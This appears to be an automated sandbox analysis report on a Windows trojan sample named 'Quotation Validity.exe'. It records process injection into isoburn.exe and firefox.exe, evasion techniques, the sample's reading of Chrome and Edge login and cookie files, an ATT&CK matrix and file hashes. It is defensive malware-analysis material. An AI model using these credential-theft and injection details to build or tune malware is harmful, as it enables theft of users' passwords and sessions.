                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013F0283 mov eax, dword ptr fs:[00000030h]9_2_013F0283
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013AE284 mov eax, dword ptr fs:[00000030h]9_2_013AE284
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013AE284 mov eax, dword ptr fs:[00000030h]9_2_013AE284
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01445283 mov eax, dword ptr fs:[00000030h]9_2_01445283
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013692FF mov eax, dword ptr fs:[00000030h]9_2_013692FF
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013802E1 mov eax, dword ptr fs:[00000030h]9_2_013802E1
                      Source: C:\Users\user\Desktop\Quotation Validity.exe; Memory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe; NtOpenKeyEx: Direct from: 0x77672B9C
                      Source: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe; NtProtectVirtualMemory: Direct from: 0x77672F9C
                      Source: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe; NtCreateFile: Direct from: 0x77672FEC
                      Source: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe; NtOpenFile: Direct from: 0x77672DCC
                      Source: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe; NtTerminateThread: Direct from: 0x77672FCC
                      Source: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe; NtProtectVirtualMemory: Direct from: 0x77667B2E
                      Source: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe; NtQueryInformationToken: Direct from: 0x77672CAC
                      Source: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe; NtAllocateVirtualMemory: Direct from: 0x77672BEC
                      Source: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe; NtDeviceIoControlFile: Direct from: 0x77672AEC
                      Source: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe; NtQuerySystemInformation: Direct from: 0x776748CC
                      Source: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe; NtQueryAttributesFile: Direct from: 0x77672E6C
                      Source: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe; NtSetInformationThread: Direct from: 0x77672B4C
                      Source: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe; NtOpenSection: Direct from: 0x77672E0C
                      Source: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe; NtQueryVolumeInformationFile: Direct from: 0x77672F2C
                      Source: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe; NtAllocateVirtualMemory: Direct from: 0x776748EC
                      Source: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe; NtSetInformationThread: Direct from: 0x776663F9
                      Source: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe; NtReadVirtualMemory: Direct from: 0x77672E8C
                      Source: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe; NtCreateKey: Direct from: 0x77672C6C
                      Source: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe; NtClose: Direct from: 0x77672B6C
                      Source: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe; NtWriteVirtualMemory: Direct from: 0x7767490C
                      Source: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe; NtAllocateVirtualMemory: Direct from: 0x77673C9C
                      Source: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe; NtDelayExecution: Direct from: 0x77672DDC
                      Source: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe; NtCreateUserProcess: Direct from: 0x7767371C
                      Source: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe; NtQuerySystemInformation: Direct from: 0x77672DFC
                      Source: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe; NtQueryInformationProcess: Direct from: 0x77672C26
                      Source: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe; NtResumeThread: Direct from: 0x77672FBC
                      Source: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe; NtReadFile: Direct from: 0x77672ADC
                      Source: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe; NtAllocateVirtualMemory: Direct from: 0x77672BFC
                      Source: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe; NtResumeThread: Direct from: 0x776736AC
                      Source: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe; NtSetInformationProcess: Direct from: 0x77672C5C
                      Source: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe; NtMapViewOfSection: Direct from: 0x77672D1C
                      Source: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe; NtNotifyChangeKey: Direct from: 0x77673C2C
                      Source: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe; NtWriteVirtualMemory: Direct from: 0x77672E3C
                      Source: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe; NtCreateMutant: Direct from: 0x776735CC
                      Source: C:\Users\user\Desktop\Quotation Validity.exe; Memory written: C:\Users\user\Desktop\Quotation Validity.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\Desktop\Quotation Validity.exe; Section loaded: NULL target: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe protection: execute and read and write
                      Source: C:\Users\user\Desktop\Quotation Validity.exe; Section loaded: NULL target: C:\Windows\SysWOW64\isoburn.exe protection: execute and read and write
                      Source: C:\Windows\SysWOW64\isoburn.exe; Section loaded: NULL target: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe protection: read write
                      Source: C:\Windows\SysWOW64\isoburn.exe; Section loaded: NULL target: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe protection: execute and read and write
                      Source: C:\Windows\SysWOW64\isoburn.exe; Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                      Source: C:\Windows\SysWOW64\isoburn.exe; Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                      Source: C:\Windows\SysWOW64\isoburn.exe; Thread register set: target process: 736
                      Source: C:\Windows\SysWOW64\isoburn.exe; Thread APC queued: target process: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
                      Source: C:\Users\user\Desktop\Quotation Validity.exe; Process created: C:\Users\user\Desktop\Quotation Validity.exe "C:\Users\user\Desktop\Quotation Validity.exe"
                      Source: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe; Process created: C:\Windows\SysWOW64\isoburn.exe "C:\Windows\SysWOW64\isoburn.exe"
                      Source: C:\Windows\SysWOW64\isoburn.exe; Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                      Source: KnETAajUsFuuTQ.exe, 0000000B.00000000.1625027564.0000000001180000.00000002.00000001.00040000.00000000.sdmp, KnETAajUsFuuTQ.exe, 0000000B.00000002.3730968736.0000000001181000.00000002.00000001.00040000.00000000.sdmp, KnETAajUsFuuTQ.exe, 0000000D.00000000.1771216433.0000000000F30000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Shell_TrayWnd
                      Source: KnETAajUsFuuTQ.exe, 0000000B.00000000.1625027564.0000000001180000.00000002.00000001.00040000.00000000.sdmp, KnETAajUsFuuTQ.exe, 0000000B.00000002.3730968736.0000000001181000.00000002.00000001.00040000.00000000.sdmp, KnETAajUsFuuTQ.exe, 0000000D.00000000.1771216433.0000000000F30000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                      Source: KnETAajUsFuuTQ.exe, 0000000B.00000000.1625027564.0000000001180000.00000002.00000001.00040000.00000000.sdmp, KnETAajUsFuuTQ.exe, 0000000B.00000002.3730968736.0000000001181000.00000002.00000001.00040000.00000000.sdmp, KnETAajUsFuuTQ.exe, 0000000D.00000000.1771216433.0000000000F30000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: EProgram Manager
                      Source: KnETAajUsFuuTQ.exe, 0000000B.00000000.1625027564.0000000001180000.00000002.00000001.00040000.00000000.sdmp, KnETAajUsFuuTQ.exe, 0000000B.00000002.3730968736.0000000001181000.00000002.00000001.00040000.00000000.sdmp, KnETAajUsFuuTQ.exe, 0000000D.00000000.1771216433.0000000000F30000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\Quotation Validity.exeQueries volume information: C:\Users\user\Desktop\Quotation Validity.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      Source: Yara match | File source: 9.2.Quotation Validity.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 9.2.Quotation Validity.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0000000D.00000002.3734770459.0000000004C70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000009.00000002.1713438377.0000000003BC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000C.00000002.3724879473.0000000002A40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000009.00000002.1698550308.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000C.00000002.3729826562.0000000002F50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000C.00000002.3732445014.0000000004AD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000009.00000002.1704236127.00000000016E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000B.00000002.3732187285.0000000002910000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 2.2.Quotation Validity.exe.44324c8.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.2.Quotation Validity.exe.5e70000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.2.Quotation Validity.exe.5e70000.5.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.2.Quotation Validity.exe.44324c8.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.2.Quotation Validity.exe.348d3b8.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000002.00000002.1306858110.0000000005E70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000002.1304383936.0000000004419000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000002.1302792187.000000000345F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: C:\Windows\SysWOW64\isoburn.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Windows\SysWOW64\isoburn.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                      Source: C:\Windows\SysWOW64\isoburn.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                      Source: C:\Windows\SysWOW64\isoburn.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                      Source: C:\Windows\SysWOW64\isoburn.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Windows\SysWOW64\isoburn.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                      Source: C:\Windows\SysWOW64\isoburn.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                      Source: C:\Windows\SysWOW64\isoburn.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Windows\SysWOW64\isoburn.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                      Remote Access Functionality

                      Source: Yara match | File source: 9.2.Quotation Validity.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 9.2.Quotation Validity.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0000000D.00000002.3734770459.0000000004C70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000009.00000002.1713438377.0000000003BC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000C.00000002.3724879473.0000000002A40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000009.00000002.1698550308.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000C.00000002.3729826562.0000000002F50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000C.00000002.3732445014.0000000004AD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000009.00000002.1704236127.00000000016E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000B.00000002.3732187285.0000000002910000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 2.2.Quotation Validity.exe.44324c8.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.2.Quotation Validity.exe.5e70000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.2.Quotation Validity.exe.5e70000.5.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.2.Quotation Validity.exe.44324c8.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.2.Quotation Validity.exe.348d3b8.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000002.00000002.1306858110.0000000005E70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000002.1304383936.0000000004419000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000002.1302792187.000000000345F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 412 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 121 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Abuse Elevation Control Mechanism | 1 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 11 Archive Collected Data | 4 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 41 Virtualization/Sandbox Evasion | Security Account Manager | 41 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | 5 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 412 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 5 Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 11 Deobfuscate/Decode Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | 113 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 4 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 22 Software Packing | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
| Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 DLL Side-Loading | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |

                      [Behavior graph, image not reproduced. Behavior Graph ID: 1566632, Sample: Quotation Validity.exe, Startdate: 02/12/2024, Architecture: WINDOWS, Score: 100. Process chain: Quotation Validity.exe started Quotation Validity.exe, which injected into KnETAajUsFuuTQ.exe; KnETAajUsFuuTQ.exe started isoburn.exe, which injected into KnETAajUsFuuTQ.exe and started firefox.exe.]

| Source | Detection | Scanner | Label | Link |
| --- | --- | --- | --- | --- |
| Quotation Validity.exe | 68% | ReversingLabs | ByteCode-MSIL.Trojan.Remcos | |
| Quotation Validity.exe | 100% | Avira | HEUR/AGEN.1307356 | |
| Quotation Validity.exe | 100% | Joe Sandbox ML | | |

                      No Antivirus matches
                      No Antivirus matches
                      No Antivirus matches
                                                          NameSourceMaliciousAntivirus DetectionReputation
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                              Analysis ID:1566632
                                                                              Start date and time:2024-12-02 14:41:45 +01:00
                                                                              Joe Sandbox product:CloudBasic
                                                                              Overall analysis duration:0h 11m 24s
                                                                              Hypervisor based Inspection enabled:false
                                                                              Report type:full
                                                                              Cookbook file name:default.jbs
                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                              Number of analysed new started processes analysed:17
                                                                              Number of new started drivers analysed:0
                                                                              Number of existing processes analysed:0
                                                                              Number of existing drivers analysed:0
                                                                              Number of injected processes analysed:2
                                                                              Technologies:
                                                                              • HCA enabled
                                                                              • EGA enabled
                                                                              • AMSI enabled
                                                                              Analysis Mode:default
                                                                              Analysis stop reason:Timeout
                                                                              Sample name:Quotation Validity.exe
                                                                              Detection:MAL
                                                                              Classification:mal100.troj.spyw.evad.winEXE@7/2@19/12
                                                                              EGA Information:
                                                                              • Successful, ratio: 75%
                                                                              HCA Information:
                                                                              • Successful, ratio: 93%
                                                                              • Number of executed functions: 107
                                                                              • Number of non-executed functions: 250
                                                                              Cookbook Comments:
                                                                              • Found application associated with file extension: .exe
                                                                              • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, Sgrmuserer.exe, conhost.exe, svchost.exe
                                                                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                              • VT rate limit hit for: Quotation Validity.exe
Time | Type | Description
08:42:37 | API Interceptor | 2x Sleep call for process: Quotation Validity.exe modified
08:43:56 | API Interceptor | 9272042x Sleep call for process: isoburn.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                              No context
                                                                              No context
                                                                              Process:C:\Users\user\Desktop\Quotation Validity.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):1216
                                                                              Entropy (8bit):5.34331486778365
                                                                              Encrypted:false
                                                                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                              Malicious:true
                                                                              Reputation:high, very likely benign file
                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                              Process:C:\Windows\SysWOW64\isoburn.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                              Category:dropped
                                                                              Size (bytes):196608
                                                                              Entropy (8bit):1.1211596417522893
                                                                              Encrypted:false
                                                                              SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8wH0hL3kWieF:r2qOB1nxCkvSAELyKOMq+8wH0hLUZs
                                                                              MD5:0AB67F0950F46216D5590A6A41A267C7
                                                                              SHA1:3E0DD57E2D4141A54B1C42DD8803C2C4FD26CB69
                                                                              SHA-256:4AE2FD6D1BEDB54610134C1E58D875AF3589EDA511F439CDCCF230096C1BEB00
                                                                              SHA-512:D19D99A54E7C7C85782D166A3010ABB620B32C7CD6C43B783B2F236492621FDD29B93A52C23B1F4EFC9BF998E1EF1DFEE953E78B28DF1B06C24BADAD750E6DF7
                                                                              Malicious:false
                                                                              Reputation:moderate, very likely benign file
                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                              Entropy (8bit):7.8438260318907735
                                                                              TrID:
                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                              • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                              • DOS Executable Generic (2002/1) 0.01%
                                                                              File name:Quotation Validity.exe
                                                                              File size:919'040 bytes
                                                                              MD5:10f86c0378f3f9eabae2129174962df1
                                                                              SHA1:177887de20bd548063d7df47baf2893d519341a7
                                                                              SHA256:0ba8526b6a258a291665a487377351ede1601f0afcf74380556abbd789af669e
                                                                              SHA512:ba09c4bc65cd3e77b17ad44b53759a2de625ec6b2323dc39b7f5489b4b2e96543c3960c48cdb45c5e83ca67fd72cb81a9942497191af9577354ae191af8642b8
                                                                              SSDEEP:24576:D2xj4LCnYnAW8oVwZcX0isGkR6uyr6J+Q272kY:yRnYAWMcXIGkRfyr8+37J
                                                                              TLSH:98151264139FE506C4D11F788967E7F486789DC9E811C70BABDABEEFB87721624403A0
                                                                              Icon Hash:099bce4dd131078e
                                                                              Entrypoint:0x4dc71a
                                                                              Entrypoint Section:.text
                                                                              Digitally signed:false
                                                                              Imagebase:0x400000
                                                                              Subsystem:windows gui
                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                              Time Stamp:0x6747F288 [Thu Nov 28 04:33:12 2024 UTC]
                                                                              TLS Callbacks:
                                                                              CLR (.Net) Version:
                                                                              OS Version Major:4
                                                                              OS Version Minor:0
                                                                              File Version Major:4
                                                                              File Version Minor:0
                                                                              Subsystem Version Major:4
